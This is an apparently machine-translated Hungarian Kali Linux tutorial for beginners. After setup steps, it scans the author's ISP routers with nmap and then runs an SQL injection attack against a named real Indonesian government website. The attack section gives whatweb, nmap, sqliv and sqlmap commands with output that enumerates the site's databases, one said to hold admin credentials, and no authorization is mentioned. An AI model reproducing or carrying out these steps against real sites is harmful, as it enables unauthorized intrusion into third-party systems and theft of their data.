Kali Linux bemutató

Kali Linux Tutorial



Ha Ön szakértő, vagy legalábbis ismeri a Linuxot, a parancsokat és a környezetet, éppen telepítette a Kali Linuxot a gépére, és a Kali Linux mestere akart lenni, vagy Etikai Hacker, akkor jó helyen jár. Ebben a cikkben kitérek egy Kali Linux oktatóanyagra azoknak a Linux -felhasználóknak, akik még nem ismerik a Kali -t, és bemutatom néhány alapvető technikát, amelyeket a hackelés és a biztonsági tesztelés során használnak a Kali használata során.

Mi az a Kali Linux?

Kali Linux, ( először 2013. március 13 -án jelent meg ), amelyet hivatalosan BackTrack néven ismertek, és amelyet az Offensive Security biztonsági cég fejlesztett ki, a Debian tesztelési ágán alapuló igazságügyi és biztonságközpontú disztribúció. A Kali Linuxot a penetrációs tesztelésre, az adatok helyreállítására és a fenyegetések észlelésére tervezték. A projekt az év elején áttért a gördülő kiadású modellre, hogy naprakész biztonsági segédprogramokat biztosítson az elosztó felhasználói számára. A Kali Linux ingyenes, és mindig is az lesz. Több mint 600 behatolási teszteszközt tartalmaz.







Miért a Kali Linux? Önnek megfelelő?

A Kali Linux nagy népszerűségre tett szert az utóbbi időben. És ennek oka van. A hackelés a népszerű kultúra egyik legcsodálatosabb dolga, és ez jelentős mértékben a Mr. Robot című tévésorozatnak tulajdonítható. Mr. Robot népszerűsége segített a Kali Linuxnak új felhasználók megszerzésében. Azok az emberek, akik alig ismerik a Linuxot vagy a számítógépes biztonsággal kapcsolatos dolgokat, most a Kali -t próbálják fő Linux -terjesztésként használni.



A legfejlettebb behatolási teszteloszlásunk, valaha. - Kali Linux fejlesztők. (Ez a Kali.org főoldalán van írva, az oldal tetején.) Mit kap ebből az állításból? Észreveszi ezt: APTD (Advanced Penetration Testing Distribution)? Itt nincs szó hackelés szó szerint. A Kali Linux ugyanaz, mint a többi Linux disztribúció. Egyszerűen fogalmazva, ez egy Linux disztribúció, amely biztonsággal kapcsolatos eszközökkel van tele, és a hálózati és számítógépes biztonsági szakértőknek szól. A Kali Linux használata azonban csak a biztonságra és a kriminalisztikára összpontosít.



A Linux disztribúció nem más, mint egy csomag, amely tartalmazza a Linux kernelt, az alapvető segédprogramok és alkalmazások készletét és néhány alapértelmezett beállítást. Tehát a Kali Linux ebben az értelemben nem kínál egyedülálló dolgokat, a legtöbb eszköz telepíthető bármilyen Linux disztribúcióra.





A Kali Linux kifejezetten a professzionális penetrációs tesztek és biztonsági auditok követelményeinek felel meg. Célja a Linux felhasználók egy bizonyos alcsoportja. Pentesterek, hackerek stb. Nem ajánlott a disztribúció, ha a Kalit általános célú Linux asztali számítógépre tervezi fejlesztésre, webdesignra, játékra, irodára stb. .

DOLGOZÁSOK A KALI LINUX TELEPÍTÉSE UTÁN

A Kali Linux telepítése után felmerülhet a kérdés, hogy mi a teendő ezzel, ugye ?. Mindenki szembesül ezzel a problémával, ne aggódjon.



1. LÉPÉS: A TÁROLÓ BEÁLLÍTÁSA

Először is lehet, hogy ezt már tudja, de elengedhetetlen a tároló helyes beállítása. Mint mondtam, a Kali Linux gördülő kiadási modellje arra törekszik, hogy naprakész biztonsági segédprogramokat biztosítson az elosztó felhasználói számára. Általában, ha frissen telepítette a Kali Linuxot, a tároló a telepítéshez használt adathordozóra hivatkozik. Ennek kijavításához módosítania kell a lerakatot a hivatalos Kali Linux tárolóra. A szükséges fájl alatt található /etc/apt/sources.list . Nyissa meg a fájlt a leafpad szövegszerkesztőjével, és cserélje le az alapértelmezett lerakatot erre a hivatalos Kali Rolling adattárra:

deb http://http.kali.org/kali kali-rolling main contrib non-free # For source package access, uncomment the following line # deb-src http://http.kali.org/kali kali-rolling main contrib non-free 

2. LÉPÉS: KALI LINUX FRISSÍTÉSE ÉS FRISSÍTÉSE

A frissítés és a rendszer frissítése után szinkronizálja a Kali Linuxot a legújabb verzióra. Ehhez nyissa meg a terminált, és írja be:

apt update -y && apt upgrade -y && apt dist-upgrade 

Az apt update parancs letölti és lekéri a csomagok listáját a tárolókról, és frissíti azokat, hogy információkat kapjon a csomagok legújabb verzióiról és azok függőségeiről.

Az apt upgrade parancs letölti és telepíti a telepített Kali Linux csomagok újabb verzióit, amennyiben nem tartalmaz hibákat a függőségektől.

Az apt dist-upgrade frissíti az összes csomagot a legújabb elérhető verzióra, függetlenül attól. És szükség szerint telepítse és távolítsa el a függőségeket (nyilvánvalóan telepítse a függőségeket, hogy kielégítse a csomagokat, de távolítsa el azokat a függőségeket is, amelyek elárvultak, ha a frissített csomag már nem igényli a függőséget.

ALAPPENETRÁCIÓS VIZSGÁLATI KONCEPCIÓ KALI LINUX -AL

Miután sikeresen elvégezte ezeket a lépéseket, a célzott rendszer alapján három fő dolgot tehet a Kali Linux segítségével:

  1. Vezeték nélküli hálózati hackelés - Wifi hacker, phising, ARP mérgezés stb.
  2. Webes alkalmazások feltörése -SQL-befecskendezés, webhelyek közötti kéréshamisítás (CSRF), webes adathalászat stb.
  3. Eszközhackelés - Használd ki a célgépet, hogy megszerezd az irányítást.

Nem veszem figyelembe az IoT hackelést, ez nem jelenti azt, hogy a Kali Linuxnak nincs erre képessége. De szó szerint ez is az eszközhackeléshez tartozhat. Mivel az eszköz fizikai megjelenéssel és formával rendelkezik. Ebben az oktatóanyagban az alapvető ismereteiket ismertettem. Mivel a Kali Linux hatalmas, nem fér el egy cikkben!

Tudnia kell továbbá a behatolási teszt ciklust vagy eljárást. Ők:

  1. Felderítés - információgyűjtés
  2. Szkennelés
  3. Művelet
  4. Kizsákmányolás utáni

VEZETÉK NÉLKÜLI HÁLÓZATHAKING KALI LINUX -AL

Ami a vezeték nélküli hálózat feltörését illeti, az áldozat eltérő lehet. Mivel a vezeték nélküli hálózatok több dologból állnak, mint például az ISP (Internet Service Provider), az útválasztó és társai (modem, hub, switch, stb.) És az ügyfelek (felhasználók, CCTV, távoli számítógép stb.). Vannak sebezhető lehetőségeik is.

Az Internet a hálózati hardverek nagy és összetett összessége, amelyet átjárók kapcsolnak össze. A csomagok által követett útvonal követése fontos ahhoz, hogy tudja, hogyan érhet el egy adott gazdagépnevet vagy cél IP -címet.

A Kali Linux rendelkezik egy beépített Traceroute eszközzel. A Traceroute felhasználja az IP protokoll idejét az élő mezőhöz, és megpróbál ICMP TIME_EXCEEDED választ kiváltani az egyes átjárókból az útvonalak valamelyik gazdagép felé. A Traceroute megpróbálja nyomon követni azt az útvonalat, amelyet egy IP -csomag követne néhány internetes gazdagép számára, ha kis TTL -vel (time to live) rendelkező szondacsomagokat indít, majd az ICMP által meghaladott ideig meghallgatja az átjáró válaszát. Megadok Önnek példát, hogyan lehet nyomon követni a kapcsolatunk kezelésére használt ISP útválasztót a Traceroute segítségével.

1. Felismerés

Az információgyűjtés a legfontosabb kezdet, ne hagyja ki ezt a lépést. Ebben a lépésben az a célunk, hogy minél több hasznos információt szerezzünk, amit kaphatunk, majd ezt az információt felhasználjuk a további lépésekhez.

Először nyisson meg egy terminált, és írja be ezt a parancsot, hogy elkezdje nyomon követni a webhelyhez vezető utat, ebben az esetben a webhelyet a google.com -ra állítom.

traceroute google.com 

Traceroute képernyőkép

2. Szkennelés

Miután elindítottuk a parancsokat, sorban felsorolja, hogy hová kerül a csomagunk. Amint fentebb láthatod, 3 ugrást kaptam, amelyek közül az egyik az internetszolgáltatóm. A lista első IP -je a router, amely átjáróként működik. És a következő kettő az internetszolgáltatómhoz tartozik. Most nézzük meg az általuk futtatott szolgáltatást az Nmap segítségével. Tehát azok a célpontok, amelyeket át fogunk vizsgálni 10.152.192.1 és 10.13.223.102 . A terminálon a következő parancsot futtattam:

nmap -v -sS [IP Target] -Pn 

Bontsuk le a parancs érvelését:

-v = Beszédmód engedélyezése

-sS = TCP SYN szkennelési technika használata

-Pn = Kezelje az összes gazdagépet online -hagyja ki a gazdafelfedezést

És itt az eredmény, amit kaptunk.

nmap képernyőfelvétel 2

Sajnos minden port be van kapcsolva 10.152.192.1 szűrve van, ez azt jelenti, hogy az összes bejövő TCP -kapcsolatot letiltja az IDS vagy a tűzfal ezen az IP -címen. Most tegyünk egy újabb vizsgálatot a második célponthoz.

nmap képernyőfelvétel 1

3. Működés

Ebben az eljárásban nem a valódi kizsákmányolást akarom végezni, hanem megmutatom, hogyan. A fenti Nmap szkennelési eredmény alapján tudjuk, hogy ezen az IP -n SSH szerver fut a 22 -es porton, és ez nyitva van. Nyílt a bruteforced, haha! Megtaláltuk a lyukat, ez az SSH szerver a lehetséges lyuk, ahová megpróbálhatunk hozzáférni. A Kali Linux számos olyan eszközt tartalmaz, amelyek támogatják a bruteforce vagy szótári támadásokat az SSH protokoll ellen. Az egyik legnépszerűbb és legerősebb a Hydra.

Ok, ez egy alap eljárás volt, amely egy penetrációs tesztet hajtott végre egy célzott szerver ellen, amely a példánkban az én internetszolgáltatóm.

WEB -ALKALMAZÁSOK KALI LINUX -AL

Valójában, ha rajongsz érte, beállíthatod a hackelési környezetedet a DWVA (Damn Vulnerable Web App) telepítésével a Kali Linuxodba. Ez egy PHP/MySQL webes alkalmazás, amely számos sebezhető lyukat tartalmaz. Fő célja, hogy segítségnyújtás legyen a biztonsági szakemberek számára, hogy jogi környezetben tesztelhessék készségeiket és eszközeiket, és segítsenek a webfejlesztőknek jobban megérteni a webes alkalmazások biztonságának folyamatait. A DWVA ingyenesen letölthető a Githubon itt: https://github.com/ethicalhack3r/DVWA.

Most megmutatom, hogyan kell webes alkalmazások hackelését végrehajtani egy valódi webhelyen. De ígérd meg, hogy csak oktatási célokra korlátozódik. Valódi támadást szimulálunk valódi webhely ellen SQL befecskendezéssel.

Előfeltétel

Lefedett eszközök:

-Whatweb (előre telepített)

-Nmap (előre telepített)

- SQLiv (manuális telepítés)

-SQLMap (előre telepített)

Szükségünk van még egy további eszközre, amely elérhető a Githubon itt: https://github.com/Hadesy2k/sqliv, először telepítse a Kali Linuxra. Ez az SQLiv nevű eszköz, amely képes célzott vizsgálatot végezni azáltal, hogy meghatározott tartományt biztosít (feltérképezéssel). Írja be a terminálba:

git clone https://github.com/Hadesy2k/sqliv.git cd sqliv && sudo python2 setup.py -i 

Cél: www.trenggalekkab.go.id

1. Felismerés

Gyűjtsünk össze annyi hasznos információt, amennyit csak tudunk. Megnyithatjuk a weboldalt, és felismerhetjük, hogy milyen alkalmazás fut ezen az oldalon. Először is nézzük meg, hogy milyen webhelyről van szó. Ehhez a whatweb -et fogjuk használni.

whatweb www.trenggalekkab.go.id 

Milyen webes képernyőkép

Amint láthatja a fenti eredményt, a cél Indonéziában található. Ez fut Apache v.2.2.27 a webszerverén és van is PHP v5.4.31 , van IP címe 103.247.21.142 . Oké, jegyezd meg ezt. Előfordulhat, hogy fel kell keresnie a webhelyét, és meg kell keresnie a létrehozott fájlt vagy oldalt, URL -paramétereket vagy akár bejelentkezési űrlapot. Egyelőre erre az IP -címre van szükségünk a következő lépéshez, amely a szkennelés.

2. Szkennelés

A korábbiakhoz hasonlóan ismét az Nmap segítségével ellenőrizzük, hogy milyen portok és szolgáltatások futnak a célhelyen.

nmap -v -sS 103.247.21.142 

És itt az eredmény, amit kaptunk:

Completed SYN Stealth Scan at 21:22, 261.93s elapsed (1000 total ports) Nmap scan report for ip-103-247-21-142.wifian.net.id (103.247.21.142) Host is up (0.069s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 212/tcp open anet 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3128/tcp filtered squid-http  3306/tcp open mysql  

Van egy csomó nyitott port, amely a cél minden egyes szolgáltatását kezeli, de a szemet gyönyörködtető a mysql szolgáltatás a 3306-os porton. Azt jelzi, hogy ez az oldal mysql hogy adataikat adatbázisokban kezeljék. Kíváncsi vagyok, vannak -e SQL Injection biztonsági rések ezen az oldalon. Tehát újra megvizsgálom a webhelyet az éppen telepített SQLiv használatával. Beírtam a parancsot:

sqliv -t www.trenggalekkab.go.id 

SQLHacking ScreenShot1

Ezen a webhelyen 2 lehetséges SQL sérülékeny URL -t találtunk. Jegyezze fel ezeket az URL -eket.

3. Működés

Rendben, van SQL sebezhető URL -címünk, és készen állunk a végrehajtásra. Ehhez SQLMap -ot fogunk használni. A szintaxis a következő:

sqlmap [Vulnerable URL] --dbs 

A parancsnak így kell kinéznie:

 sqlmap -u "http://www.trenggalekkab.go.id/berita.php?page=208" --dbs 

A –dbs érv az, hogy az SQLMap -nak meg kell adnia a cél -adatbázisokat. Íme a kimenet:

[INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.31, Apache 2.2.27 back-end DBMS: MySQL 5 [21:46:04] [INFO] fetching database names [21:46:04] [INFO] the SQL query used returns 2 entries [21:46:04] [INFO] resumed: information_schema [21:46:04] [INFO] resumed: trengkab_trg available databases [2]: [*] information_schema [*] trengkab_trg 

Az SQLMap 2 adatbázist talált, de közülük csak egyet, amely érzékeny adatokat tartalmaz, például egy adminisztrátori hitelesítési fiókot. Ez a trengkab_trg. Miután megtaláltuk az adatbázisokat, van még egy lépés, amelyet meg kell tennünk. Vagyis megkeressük a táblázatokat és oszlopokat, és az utolsó lépés az adatok kiürítése. Ebben a részben nem mutatom meg, hogyan kell ezt a célt használni. Legalább ismeri a támadásciklus alapötletét és bizonyos eszközöket.

KÉSZÜLÉKHAKING

Ezen az oldalon egy későbbi cikkünkben az eszközhackelésről lesz szó, maradjon velünk. Előzetes figyelmeztetésként meg kell győződnie arról, hogy ismer néhány Python-ot ehhez.